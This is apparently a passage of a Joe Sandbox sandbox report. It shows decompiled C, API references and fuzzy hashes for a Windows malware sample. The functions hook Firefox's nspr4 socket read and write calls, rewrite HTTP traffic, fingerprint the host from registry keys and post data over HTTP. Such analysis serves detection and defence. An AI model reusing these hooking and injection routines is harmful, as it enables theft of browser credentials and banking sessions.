            								 *(_t189 + 8) = _v64;
            								 *((intOrPtr*)(_t189 + 0x1c)) = _v76;
            								 *(_t189 + 0x20) = _v72;
            								 *(_t189 + 0x28) = _a12;
            								goto L29;
            							}
            							_t205 = _v76;
            							__eflags = _t205;
            							if(_t205 != 0) {
            								_t138 = _v72;
            							} else {
            								_t205 = _a8;
            								_t138 = _a12;
            							}
            							_v68 = _t138;
            							_v88 = E0040AA77(_v68, _t205, _v28, _v24,  &_v76);
            							E00410418(_v44);
            							__eflags = _v92;
            							if(_v92 != 0) {
            								__eflags = _t205 - _a8;
            								if(_t205 != _a8) {
            									E00410418(_t205);
            								}
            							} else {
            								__eflags = _t205 - _a8;
            								if(_t205 == _a8) {
            									goto L37;
            								}
            								_v76 = _t205;
            								_v72 = _v68;
            							}
            							goto L27;
            						} else {
            							E00407754( &_v60);
            							LeaveCriticalSection(0x41a9f0);
            							_t112 =  *0x41a9ec(0xffffe8a3, 0) | 0xffffffff;
            							goto L10;
            						}
            					} else {
            						E0040A3B7(_v68);
            						E00407754( &_v60);
            						goto L8;
            					}
            				}
            			}

            APIs
              • Part of subcall function 00403E2A: WaitForSingleObject.KERNEL32(000000FF,00404A1C), ref: 00403E32
              • Part of subcall function 00403E39: WaitForSingleObject.KERNEL32(00000000,00405F1B,00000310,00000000,00000310,909011A2,00000002), ref: 00403E41
            • EnterCriticalSection.KERNEL32(0041A9F0), ref: 0040B26C
            • LeaveCriticalSection.KERNEL32(0041A9F0), ref: 0040B2CA
            • LeaveCriticalSection.KERNEL32(0041A9F0), ref: 0040B311
            • LeaveCriticalSection.KERNEL32(0041A9F0), ref: 0040B47C
            • EnterCriticalSection.KERNEL32(0041A9F0), ref: 0040B49B
            • LeaveCriticalSection.KERNEL32(0041A9F0), ref: 0040B4FB
            • LeaveCriticalSection.KERNEL32(0041A9F0), ref: 0040B526
            • EnterCriticalSection.KERNEL32(0041A9F0), ref: 0040B545
            • LeaveCriticalSection.KERNEL32(0041A9F0), ref: 0040B58D
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.260107317.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000000.00000002.260144687.000000000041C000.00000040.00000001.01000000.00000003.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_400000_Rd1Kf1A4cB.jbxd
            Similarity
            • API ID: CriticalSection$Leave$Enter$ObjectSingleWait
            • String ID: Accept-Encoding$If-Modified-Since$identity
            • API String ID: 3286975823-3034467039
            • Opcode ID: 205d78ab8d769130560eb1e77c96101c48fc9d797f1f205b47c3e261e9c3fe52
            • Instruction ID: 469a88ef300fe4c6656e49afb92f3cee3de25d7ea1839db42cc55efcad75fa96
            • Opcode Fuzzy Hash: 205d78ab8d769130560eb1e77c96101c48fc9d797f1f205b47c3e261e9c3fe52
            • Instruction Fuzzy Hash: 3CA16A71504701ABCB00EF24DD45A5ABBA4FF88314F104A2EF855B72A2D738E995CBDA
            Uniqueness

            Uniqueness Score: -1.00%

            Control-flow Graph

            • Executed
            • Not Executed
            control_flow_graph 882 4064da-406535 GetProcAddress * 4 ResetEvent call 406290 885 406556-406566 SetEvent 882->885 886 406537-406551 call 40a754 882->886 886->885
            C-Code - Quality: 70%
            			E004064DA(void* __ecx, void* __edx, struct HINSTANCE__* __edi) {
            				void* _t6;
            				void* _t12;
            				void* _t13;
            				void* _t14;
            
            				_t14 = __edx;
            				_t13 = __ecx;
            				 *0x41a140 = GetProcAddress(__edi, "PR_OpenTCPSocket");
            				 *0x41a150 = GetProcAddress(__edi, "PR_Close");
            				 *0x41a160 = GetProcAddress(__edi, "PR_Read");
            				 *0x41a170 = GetProcAddress(__edi, "PR_Write");
            				ResetEvent( *0x41a500);
            				_push(0);
            				_push(0x41a140);
            				_t6 = 4;
            				_t12 = E00406290(_t6, _t13, _t14);
            				if(_t12 != 0) {
            					E0040A754(__edi,  *0x41a148,  *0x41a158,  *0x41a168,  *0x41a178);
            				}
            				SetEvent( *0x41a500);
            				return _t12;
            			}

            APIs
            • GetProcAddress.KERNEL32(00000000,PR_OpenTCPSocket), ref: 004064E8
            • GetProcAddress.KERNEL32(00000000,PR_Close), ref: 004064F5
            • GetProcAddress.KERNEL32(00000000,PR_Read), ref: 00406502
            • GetProcAddress.KERNEL32(00000000,PR_Write), ref: 0040650F
            • ResetEvent.KERNEL32(?,00000000,00000000), ref: 0040651C
              • Part of subcall function 00406290: VirtualAllocEx.KERNEL32(000000FF,00000000,00000012,00003000,00000040,00000000,774B9EB0,00000000,?,?,?,004064D9,0041A020,00000001,00403A56), ref: 004062CF
              • Part of subcall function 00406290: ResetEvent.KERNEL32(?,?,?,004064D9,0041A020,00000001,00403A56), ref: 004062EB
              • Part of subcall function 00406290: SetEvent.KERNEL32(?,?,?,004064D9,0041A020,00000001,00403A56), ref: 004063C8
            • SetEvent.KERNEL32(0041A140,00000000,?,00000000,00000000), ref: 0040655C
              • Part of subcall function 0040A754: InitializeCriticalSection.KERNEL32(0041A9F0,761B4EE0,00406556,0041A140,00000000,?,00000000,00000000), ref: 0040A76A
              • Part of subcall function 0040A754: GetProcAddress.KERNEL32(00000000,PR_GetNameForIdentity), ref: 0040A7A6
              • Part of subcall function 0040A754: GetProcAddress.KERNEL32(PR_SetError), ref: 0040A7B8
              • Part of subcall function 0040A754: GetProcAddress.KERNEL32(PR_GetError), ref: 0040A7CA
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.260107317.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000000.00000002.260144687.000000000041C000.00000040.00000001.01000000.00000003.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_400000_Rd1Kf1A4cB.jbxd
            Similarity
            • API ID: AddressProc$Event$Reset$AllocCriticalInitializeSectionVirtual
            • String ID: PR_Close$PR_OpenTCPSocket$PR_Read$PR_Write
            • API String ID: 2746672884-3954199073
            • Opcode ID: 229c739bdb89446b045722edcae660acdacf94e29523f492da609071b473ed91
            • Instruction ID: f1cf11553b33c3751dcade8f3c3042e1ac9c40eea95838771e869acf833da72f
            • Opcode Fuzzy Hash: 229c739bdb89446b045722edcae660acdacf94e29523f492da609071b473ed91
            • Instruction Fuzzy Hash: 55F03171942350BBCB112FB6AC09EC63FA5B745760B144037B604A72B0C7B94470DB5D
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 60%
            			E004145F1(void* __ecx, intOrPtr _a4) {
            				char _v8;
            				long _v12;
            				signed int _v16;
            				signed int _v20;
            				char _v24;
            				short _v90;
            				short _v104;
            				struct _OSVERSIONINFOW _v388;
            				void* __edi;
            				struct _OSVERSIONINFOW* _t32;
            				char _t35;
            				void* _t37;
            				void* _t41;
            				short _t43;
            				void* _t50;
            				void* _t51;
            				intOrPtr _t54;
            				signed int _t59;
            
            				_t50 = __ecx;
            				_v12 = 0x28;
            				if(GetComputerNameW( &_v104,  &_v12) == 0) {
            					E00410454( &_v104,  &M004032F4, 0xe);
            					_v90 = 0;
            				}
            				E004104CB( &_v388,  &_v388, 0, 0x11c);
            				_v388.dwOSVersionInfoSize = 0x11c;
            				if(GetVersionExW( &_v388) != 0) {
            					_push(0x100);
            					_t32 =  &(_v388.szCSDVersion);
            				} else {
            					_push(0x11c);
            					_t32 =  &_v388;
            				}
            				_push(0);
            				_push(_t32);
            				E004104CB(_t32);
            				_t35 = E0041442C(0x80000002, _t50, L"SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion", L"InstallDate");
            				_v16 = _v16 & 0x00000000;
            				_v24 = _t35;
            				_t37 = E00414526(_t50, 0x80000002, L"SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion", L"DigitalProductId", 0,  &_v8);
            				if(_t37 == 0xffffffff || _t37 <= 0) {
            					_t59 = _v16;
            				} else {
            					_t59 = E00411888(_v8, _t37);
            					E00410418(_v8);
            				}
            				_v20 = _t59;
            				_push(E00411888( &_v24, 8));
            				_t41 = E00411888( &_v388, 0x11c);
            				_t54 = _a4;
            				_push(_t41);
            				_push( &_v104);
            				_push(L"%s_%08X%08X");
            				_t51 = 0x3c;
            				_t43 = E004111A5( &_v104, _t51, _t54);
            				_v12 = _t43;
            				if(_t43 < 1) {
            					E00410454(_t54, L"fatal_error", 0x16);
            					_t43 = 0;
            					 *((short*)(_t54 + 0x16)) = 0;
            				}
            				return _t43;
            			}
            0x004145f1
            0x00414602
            0x00414611
            0x0041461e
            0x00414625
            0x00414625
            0x0041463b
            0x00414647
            0x00414655
            0x00414660
            0x00414665
            0x00414657
            0x00414657
            0x00414658
            0x00414658
            0x0041466b
            0x0041466c
            0x0041466d
            0x00414682
            0x00414687
            0x0041468b
            0x0041469f
            0x004146a7
            0x004146c2
            0x004146ad
            0x004146b9
            0x004146bb
            0x004146bb
            0x004146cb
            0x004146d3
            0x004146dc
            0x004146e1
            0x004146e4
            0x004146e8
            0x004146e9
            0x004146f0
            0x004146f1
            0x004146fc
            0x004146ff
            0x00414709
            0x0041470e
            0x00414710
            0x00414710
            0x00414717

            APIs
            • GetComputerNameW.KERNEL32 ref: 00414609
            • GetVersionExW.KERNEL32(?,?,00000000,0000011C), ref: 0041464D
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.260107317.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000000.00000002.260144687.000000000041C000.00000040.00000001.01000000.00000003.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_400000_Rd1Kf1A4cB.jbxd
            Similarity
            • API ID: ComputerNameVersion
            • String ID: %s_%08X%08X$($DigitalProductId$InstallDate$SOFTWARE\Microsoft\Windows NT\CurrentVersion$fatal_error$unknown
            • API String ID: 3835364902-2859850376
            • Opcode ID: 812c89df1f03739c0470660d35a66389628491cdffd52c45845141f66ff7945d
            • Instruction ID: a8c8fb91d9a508bc6a520adfa2854498e347105d131b216cf6e60e8ad92b4997
            • Opcode Fuzzy Hash: 812c89df1f03739c0470660d35a66389628491cdffd52c45845141f66ff7945d
            • Instruction Fuzzy Hash: AA318471D00218BADB10EBA18C41FEF77BCAF45704F10416BFA08F6191D7789B8487A8
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 58%
            			E004050B0(void* __ecx, void* __eflags, intOrPtr _a4, intOrPtr _a8) {
            				struct HINSTANCE__* _v8;
            				char _v12;
            				char _v16;
            				_Unknown_base(*)()* _v20;
            				intOrPtr _v24;
            				char _v40;
            				char _v60;
            				char _v84;
            				char _v112;
            				void* __edi;
            				void* __esi;
            				struct HINSTANCE__* _t34;
            				_Unknown_base(*)()* _t46;
            				int _t47;
            				intOrPtr _t48;
            				intOrPtr _t54;
            				intOrPtr* _t59;
            				void* _t61;
            				void* _t62;
            				void* _t63;
            				CHAR* _t65;
            				CHAR* _t66;
            				CHAR* _t67;
            				_Unknown_base(*)()* _t68;
            				WCHAR* _t70;
            				void* _t72;
            				void* _t73;
            
            				_t62 = __ecx;
            				_t70 =  &_v112;
            				E0040F369(0xaa, _t70);
            				_t34 = LoadLibraryW(_t70);
            				_v8 = _t34;
            				if(_t34 != 0) {
            					_t65 =  &_v84;
            					E0040F333(0xab, _t65);
            					_t59 = GetProcAddress(_v8, _t65);
            					_t66 =  &_v40;
            					E0040F333(0xac, _t66);
            					_v20 = GetProcAddress(_v8, _t66);
            					_t67 =  &_v60;
            					E0040F333(0xad, _t67);
            					_t46 = GetProcAddress(_v8, _t67);
            					_t72 = 0;
            					_t68 = _t46;
            					if(_t59 == 0 || _v20 == 0 || _t68 == 0) {
            						L15:
            						_t47 = FreeLibrary(_v8);
            						asm("lock adc [eax], eax");
            						return _t47;
            					} else {
            						_t48 = E00411ADE(L"SeTcbPrivilege");
            						__imp__WTSGetActiveConsoleSessionId();
            						_v24 = _t48;
            						if(_t48 != 0xffffffff) {
            							E0040503F(_t62, 0, _t68, _t48, _a4, _a8);
            						}
            						_push( &_v12);
            						_push( &_v16);
            						_push(1);
            						_push(_t72);
            						_push(_t72);
            						if( *_t59() == 0) {
            							goto L15;
            						} else {
            							_t61 = 0;
            							if(_v12 <= _t72) {
            								L14:
            								_v20(_v16);
            								goto L15;
            							} else {
            								goto L8;
            							}
            							do {
            								L8:
            								_t63 = _t72 + _v16;
            								_t19 = _t63 + 8; // 0x0
            								_t54 =  *_t19;
            								 *(_t73 + _t54 - 0x7d) =  *(_t73 + _t54 - 0x7d) << 0xf8;
            								_t61 = _t61 + 1;
            								_t72 = _t72 + 0xc;
            							} while (_t61 < _v12);
            							goto L14;
            						}
            					}
            				}
            				return _t34;
            			}
            0x004050b0
            0x004050b7
            0x004050bf
            0x004050c7
            0x004050cd
            0x004050d2
            0x004050da
            0x004050e2
            0x004050f5
            0x004050f7
            0x004050ff
            0x0040510c
            0x0040510f
            0x00405117
            0x00405122
            0x00405124
            0x00405126
            0x0040512a
            0x004051a8
            0x004051ab
            0x004051ad
            0x00000000
            0x00405135
            0x0040513a
            0x0040513f
            0x00405145
            0x0040514b
            0x00405155
            0x00405155
            0x0040515d
            0x00405161
            0x00405162
            0x00405164
            0x00405165
            0x0040516a
            0x00000000
            0x0040516c
            0x0040516c
            0x00405171
            0x004051a2
            0x004051a5
            0x00000000
            0x00000000
            0x00000000
            0x00000000
            0x00405173
            0x00405173
            0x00405176
            0x00405179
            0x00405179
            0x0040517d
            0x00405199
            0x0040519a
            0x0040519d
            0x00000000
            0x00405173
            0x0040516a
            0x0040512a
            0x004051b5

            APIs
            • LoadLibraryW.KERNEL32(?,00000000,?,?,00000000,?,00000000,00000000,?,?,.exe,00000006,?,?,?,?), ref: 004050C7
            • GetProcAddress.KERNEL32(00000000,?), ref: 004050F3
            • GetProcAddress.KERNEL32(?,?), ref: 0040510A
            • GetProcAddress.KERNEL32(?,?), ref: 00405122
            • FreeLibrary.KERNEL32(?), ref: 004051AB
              • Part of subcall function 00411ADE: GetCurrentThread.KERNEL32 ref: 00411AEE
              • Part of subcall function 00411ADE: OpenThreadToken.ADVAPI32(00000000), ref: 00411AF5
              • Part of subcall function 00411ADE: OpenProcessToken.ADVAPI32(000000FF,00000020,?), ref: 00411B07
            • WTSGetActiveConsoleSessionId.KERNEL32(SeTcbPrivilege), ref: 0040513F
              • Part of subcall function 0040503F: EqualSid.ADVAPI32(00000000,?,?,004051B9,?,00405199,004051B9,?,00000001,?,0040460E,00000001,?), ref: 00405064
              • Part of subcall function 0040503F: CloseHandle.KERNEL32(?,?,004051B9,?,00405199,004051B9,?,00000001,?,0040460E,00000001,?), ref: 004050A5
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.260107317.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000000.00000002.260144687.000000000041C000.00000040.00000001.01000000.00000003.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_400000_Rd1Kf1A4cB.jbxd
            Similarity
            • API ID: AddressProc$LibraryOpenThreadToken$ActiveCloseConsoleCurrentEqualFreeHandleLoadProcessSession
            • String ID: .exe$SeTcbPrivilege
            • API String ID: 1107370034-552748125
            • Opcode ID: 4d5ed75e361e41208e755637fe10a422b2db3b59a5a0b9b78d2ab17aac78f3b6
            • Instruction ID: af93d03e908023f8f73bbdc0f2475eb7adcf453693406e5d1e343e0320bf2611
            • Opcode Fuzzy Hash: 4d5ed75e361e41208e755637fe10a422b2db3b59a5a0b9b78d2ab17aac78f3b6
            • Instruction Fuzzy Hash: D1318B35E00219BBDB21ABA5CC40AAFBB79EF48314F100136F901FA290C7799E05DBA5
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 100%
            			E00403947(void* __ecx, void* __edx, void* __eflags) {
            				long _v8;
            				signed int _v12;
            				void _v532;
            				void* __edi;
            				unsigned int _t22;
            				void* _t29;
            				void* _t38;
            				void* _t40;
            				WCHAR* _t41;
            				void* _t42;
            				void* _t45;
            
            				_t40 = __edx;
            				_t38 = __ecx;
            				InitializeCriticalSection(0x41aa48);
            				 *0x41aa3c = 0;
            				 *0x41aa44 = 0;
            				 *0x41aa40 = 0;
            				 *0x41aa38 = 0;
            				 *0x41a9d4 = 0;
            				 *0x41a9d8 = 0;
            				InitializeCriticalSection(0x41a9bc);
            				_t41 =  &_v532;
            				E00403ED1(_t38, _t41, 0);
            				_v12 = _v12 | 0xffffffff;
            				_v8 = 0x1fe;
            				_t42 = CreateFileW(_t41, 0x80000000, 1, 0, 3, 0, 0);
            				if(_t42 != 0xffffffff) {
            					if(ReadFile(_t42,  &_v532, _v8,  &_v8, 0) != 0) {
            						_v12 = _v8;
            					}
            					CloseHandle(_t42);
            				}
            				_t22 = _v12;
            				if(_t22 == 0xffffffff || (_t22 & 0x00000001) != 0) {
            					_t22 = 0;
            				}
            				 *((short*)(_t45 + (_t22 >> 1) * 2 - 0x210)) = 0;
            				E0040BEFF( &_v532);
            				E0040A6B4( &_v532, _t40);
            				 *0x41aa18 = 0;
            				 *0x41aa34 = 0;
            				InitializeCriticalSection(0x41aa1c);
            				if(GetModuleHandleW(L"nspr4.dll") == 0) {
            					_t29 = 0;
            				} else {
            					_t29 = E004064DA(0, _t40, _t28);
            				}
            				if(_t29 != 0) {
            					 *0x41a28c =  *0x41a28c | 0x00000001;
            				}
            				E004063F7();
            				return 1;
            			}
            0x00403947
            0x00403947
            0x0040395e
            0x00403969
            0x0040396f
            0x00403975
            0x0040397b
            0x00403981
            0x00403987
            0x0040398d
            0x00403990
            0x00403996
            0x0040399b
            0x004039ae
            0x004039bb
            0x004039c0
            0x004039da
            0x004039df
            0x004039df
            0x004039e3
            0x004039e3
            0x004039e9
            0x004039ef
            0x004039f5
            0x004039f5
            0x004039fb
            0x00403a09
            0x00403a14
            0x00403a1e
            0x00403a24
            0x00403a2a
            0x00403a39
            0x00403a44
            0x00403a3b
            0x00403a3d
            0x00403a3d
            0x00403a48
            0x00403a4a
            0x00403a4a
            0x00403a51
            0x00403a5c

            APIs
            • InitializeCriticalSection.KERNEL32(0041AA48,?,00000000,00000000), ref: 0040395E
            • InitializeCriticalSection.KERNEL32(0041A9BC,?,00000000,00000000), ref: 0040398D
              • Part of subcall function 00403ED1: PathRenameExtensionW.SHLWAPI(?,.dat,?,0041A2F0,00000000,00000032,?,774B9EB0,00000000), ref: 00403F4A
            • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,00000000,00000000), ref: 004039B5
            • ReadFile.KERNEL32(00000000,?,000001FE,000001FE,00000000,?,00000000,00000000), ref: 004039D2
            • CloseHandle.KERNEL32(00000000,?,00000000,00000000), ref: 004039E3
            • InitializeCriticalSection.KERNEL32(0041AA1C,?,00000000,00000000), ref: 00403A2A
            • GetModuleHandleW.KERNEL32(nspr4.dll,?,00000000,00000000), ref: 00403A31
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.260107317.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000000.00000002.260144687.000000000041C000.00000040.00000001.01000000.00000003.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_400000_Rd1Kf1A4cB.jbxd
            Similarity
            • API ID: CriticalInitializeSection$FileHandle$CloseCreateExtensionModulePathReadRename
            • String ID: nspr4.dll
            • API String ID: 1155594396-741017701
            • Opcode ID: 4e651165b54f27171d18c63aedd34be292ea2b1fc516b58ede7e041d7070ec4f
            • Instruction ID: faa356100f19715857d71f4dc522eb06dc8f7ab7f24d0d40e61a73cbe08e654d
            • Opcode Fuzzy Hash: 4e651165b54f27171d18c63aedd34be292ea2b1fc516b58ede7e041d7070ec4f
            • Instruction Fuzzy Hash: B321CE70541208ABC7109FA9DDC9AEA3BACAF48354F10057BF014F32E0D7784A95DB5D
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 90%
            			E00411F69(void* _a4, long _a8, void* _a12, long _a16, void _a20) {
            				long _t18;
            				char* _t21;
            				signed int _t29;
            				char* _t30;
            				void* _t32;
            
            				_t29 = _a20 & 0x00000002;
            				_t18 = 0x8404f700;
            				if(_t29 != 0) {
            					_t18 = 0x8444f700;
            				}
            				if((_a20 & 0x00000004) != 0) {
            					_t18 = _t18 | 0x00800000;
            				}
            				_t30 = "POST";
            				if((_a20 & 0x00000001) == 0) {
            					_t30 = "GET";
            				}
            				_t32 = HttpOpenRequestA(_a4, _t30, _a8, "HTTP/1.1", 0,  &E0041A000, _t18, 0);
            				if(_t32 == 0) {
            					L15:
            					return 0;
            				} else {
            					if(_t29 == 0) {
            						_push(0x13);
            						_t21 = "Connection: close\r\n";
            						_pop(0);
            					} else {
            						_t21 = 0;
            					}
            					if(HttpSendRequestA(_t32, _t21, 0, _a12, _a16) == 0) {
            						L14:
            						InternetCloseHandle(_t32);
            						goto L15;
            					} else {
            						_a20 = _a20 & 0x00000000;
            						_a8 = 4;
            						if(HttpQueryInfoA(_t32, 0x20000013,  &_a20,  &_a8, 0) == 0 || _a20 != 0xc8) {
            							goto L14;
            						} else {
            							return _t32;
            						}
            					}
            				}
            			}
            0x00411f70
            0x00411f74
            0x00411f79
            0x00411f7b
            0x00411f7b
            0x00411f84
            0x00411f86
            0x00411f86
            0x00411f8f
            0x00411f94
            0x00411f96
            0x00411f96
            0x00411fb7
            0x00411fbb
            0x0041201b
            0x00000000
            0x00411fbd
            0x00411fbf
            0x00411fc7
            0x00411fc9
            0x00411fce
            0x00411fc1
            0x00411fc1
            0x00411fc3
            0x00411fe0
            0x00412014
            0x00412015
            0x00000000
            0x00411fe2
            0x00411fe2
            0x00411ff6
            0x00412005
            0x00000000
            0x00412010
            0x00000000
            0x00412010
            0x00412005
            0x00411fe0

            APIs
            • HttpOpenRequestA.WININET(?,POST,?,HTTP/1.1,00000000,0041A000,8404F700,00000000), ref: 00411FB1
            • HttpSendRequestA.WININET(00000000,Connection: close,00000013,?,?), ref: 00411FD8
            • HttpQueryInfoA.WININET(00000000,20000013,00000000,?,00000000), ref: 00411FFD
            • InternetCloseHandle.WININET(00000000), ref: 00412015
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.260107317.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000000.00000002.260144687.000000000041C000.00000040.00000001.01000000.00000003.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_400000_Rd1Kf1A4cB.jbxd
            Similarity
            • API ID: Http$Request$CloseHandleInfoInternetOpenQuerySend
            • String ID: Connection: close$GET$HTTP/1.1$POST
            • API String ID: 3080274660-1621676011
            • Opcode ID: 24308ffbff9dee3e2b49f38ef62d9c96fe29dc0cdb3a5e1c88c09a77b56a8743
            • Instruction ID: dadc4041eaa678d4d7c44e9d8a62aac32346a7d162b7ae032daa3e2f14933954
            • Opcode Fuzzy Hash: 24308ffbff9dee3e2b49f38ef62d9c96fe29dc0cdb3a5e1c88c09a77b56a8743
            • Instruction Fuzzy Hash: CE1160312412096BEB258F54CD49FEB3A98EB08754F108126FF01E62E0D7B9D9A0D7EC
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 79%
            			E0040AF18(intOrPtr _a4, intOrPtr _a8, signed int _a12) {
            				intOrPtr _v8;
            				intOrPtr _v12;
            				intOrPtr _v16;
            				char _v20;
            				signed char _v32;
            				char _v36;
            				char _v40;
            				signed int _v44;
            				void* _v48;
            				signed int _v52;
            				intOrPtr _v60;
            				intOrPtr _v68;
            				void* __ebx;
            				void* __edi;
            				void* __esi;
            				void* _t100;
            				signed int _t101;
            				signed int _t102;
            				intOrPtr _t104;
            				void* _t105;
            				signed int _t108;
            				signed int _t109;
            				signed int _t111;
            				intOrPtr _t120;
            				void* _t128;
            				void* _t132;
            				signed int _t140;
            				void* _t150;
            				struct _CRITICAL_SECTION* _t154;
            				intOrPtr _t156;
            				intOrPtr _t168;
            				signed int _t170;
            				signed int _t176;
            				char _t178;
            				void* _t179;
            				intOrPtr _t181;
            				signed int _t184;
            				intOrPtr _t187;
            				void* _t189;
            				signed int _t190;
            				void* _t192;
            				void* _t193;
            				void* _t194;
            
            				E00403E2A();
            				_t100 = E00403E39();
            				_t181 = _a4;
            				if(_t100 == 0 || _a8 == 0 || _a12 <= 0) {
            					L43:
            					_t101 =  *0x41aa14(_t181, _a8, _a12);
            					goto L44;
            				} else {
            					_t154 = 0x41a9f0;
            					EnterCriticalSection(0x41a9f0);
            					_t102 = E0040A2FB(_t181);
            					if(_t102 == 0xffffffff) {
            						L42:
            						LeaveCriticalSection(_t154);
            						goto L43;
            					}
            					_t104 = _t102 * 0x38 +  *0x41aa0c;
            					if( *((intOrPtr*)(_t104 + 0x30)) > 0) {
            						L33:
            						_t184 =  *((intOrPtr*)(_t104 + 0x30)) -  *((intOrPtr*)(_t104 + 0x34));
            						__eflags = _a12 - _t184;
            						if(_a12 < _t184) {
            							_t184 = _a12;
            						}
            						_t87 = _t104 + 0x2c; // -4303328
            						_t175 = _t87;
            						_t105 = E00410454(_a8,  *_t87 +  *((intOrPtr*)(_t104 + 0x34)), _t184);
            						 *((intOrPtr*)(_t105 + 0x34)) =  *((intOrPtr*)(_t105 + 0x34)) + _t184;
            						__eflags =  *((intOrPtr*)(_t105 + 0x34)) -  *((intOrPtr*)(_t105 + 0x30));
            						if( *((intOrPtr*)(_t105 + 0x34)) ==  *((intOrPtr*)(_t105 + 0x30))) {
            							E00410418( *_t175);
            							E004104B9(_t175, 0xc);
            						}
            						LeaveCriticalSection(_t154);
            						_t101 = _t184;
            						L44:
            						return _t101;
            					}
            					if( *((intOrPtr*)(_t104 + 0x10)) <= 0) {
            						goto L42;
            					}
            					LeaveCriticalSection(0x41a9f0);
            					_t108 =  *0x41aa14(_t181, _a8, _a12);
            					_v52 = _t108;
            					if(_t108 <= 0xffffffff) {
            						L41:
            						_t101 = _v52;
            						goto L44;
            					}
            					EnterCriticalSection(0x41a9f0);
            					_t109 = E0040A2FB(_t181);
            					_t176 = _t109;
            					if(_t176 == 0xffffffff) {
            						L38:
            						_push(8);
            						_push(0xffffe890);
            						L39:
            						 *0x41a9ec();
            						_v52 = _v52 | 0xffffffff;
            						L40:
            						LeaveCriticalSection(_t154);
            						goto L41;
            					}
            					_t170 = _v52;
            					if(_t170 == 0) {
            						L11:
            						_t178 = _t176 * 0x38 +  *0x41aa0c;
            						_v36 = _t178;
            						if(_t170 > 0) {
            							E00410454( *((intOrPtr*)(_t178 + 0x14)) +  *((intOrPtr*)(_t178 + 0x18)), _a8, _t170);
            							 *((intOrPtr*)(_t178 + 0x18)) =  *((intOrPtr*)(_t178 + 0x18)) + _t170;
            						}
            						_t111 = E0040AB2D(_t157,  &_v20,  *((intOrPtr*)(_t178 + 0x14)),  *((intOrPtr*)(_t178 + 0x18)));
            						_v52 = _t111;
            						if(_t111 == 1) {
            							_t120 = E0040ACD5( &_v20,  *((intOrPtr*)(_t178 + 0x18)),  *((intOrPtr*)(_t178 + 0x14)), ( &_v48 & 0xffffff00 | _v52 == 0x00000000) & 0x000000ff,  &_v48,  &_v40);
            							_v60 = _t120;
            							if(_t120 == 1) {
            								if(E004072B2( *((intOrPtr*)(_t178 + 0x10)),  *((intOrPtr*)(_t178 + 0xc)),  *((intOrPtr*)(_t178 + 4)),  &_v48,  &_v40) != 0) {
            									_t156 = _v40;
            									_t128 =  *((intOrPtr*)(_t178 + 0x18)) - _v8 + _v12;
            									_t129 = _t128 + _t156 + 0x14;
            									if(_t128 + _t156 + 0x14 != 0) {
            										_t187 = E004103ED(_t129);
            										_v40 = _t187;
            										if(_t187 != 0) {
            											_t132 = E00410454(_t187,  *((intOrPtr*)(_t178 + 0x14)), _v12);
            											_push(_t156);
            											if((_v32 & 0x00000002) == 0) {
            												E00410BF3( &_v32);
            												_t189 = E00415540(_t187, _v16, "Content-Length",  &_v36) + _v60;
            												E00410454(_t189, _v68, _t156);
            												_t190 = _t189 + _t156;
            												__eflags = _t190;
            											} else {
            												_push("%x\r\n");
            												_t192 = _t187 + _t132;
            												_t179 = 0xd;
            												_t193 = _t192 + E004111E9(_t132, _t179, _t192);
            												E00410454(_t193, _v48, _t156);
            												_t194 = _t193 + _t156;
            												E00410454(_t194, "\r\n0\r\n\r\n", 7);
            												_t178 = _v60;
            												_t190 = _t194 + 7;
            											}
            											_t138 =  *((intOrPtr*)(_t178 + 0x18));
            											if(_v8 !=  *((intOrPtr*)(_t178 + 0x18))) {
            												_t190 = _t190 + E00410454(_t190,  *((intOrPtr*)(_t178 + 0x14)) + _v8, _t138 - _v8);
            											}
            											E00410418( *((intOrPtr*)(_t178 + 0x14)));
            											_t140 = _v44;
            											 *((intOrPtr*)(_t178 + 0x14)) = _t140;
            											 *((intOrPtr*)(_t178 + 0x18)) = _t190 - _t140;
            										}
            									}
            								}
            								_v44 = _v44 | 0xffffffff;
            								E00410418(_v48);
            							}
            							_t154 = 0x41a9f0;
            						}
            						if(_v52 <= 0) {
            							L30:
            							if(__eflags == 0) {
            								L32:
            								 *((intOrPtr*)(_t178 + 0x2c)) =  *((intOrPtr*)(_t178 + 0x14));
            								 *((intOrPtr*)(_t178 + 0x30)) =  *((intOrPtr*)(_t178 + 0x18));
            								 *((intOrPtr*)(_t178 + 0x34)) = 0;
            								 *((intOrPtr*)(_t178 + 0x14)) = 0;
            								 *((intOrPtr*)(_t178 + 0x18)) = 0;
            								E004077A6( *((intOrPtr*)(_t178 + 0x10)),  *((intOrPtr*)(_t178 + 0xc)));
            								_t104 = _v40;
            								 *((intOrPtr*)(_t178 + 0x10)) = 0;
            								 *((intOrPtr*)(_t178 + 0xc)) = 0;
            								goto L33;
            							}
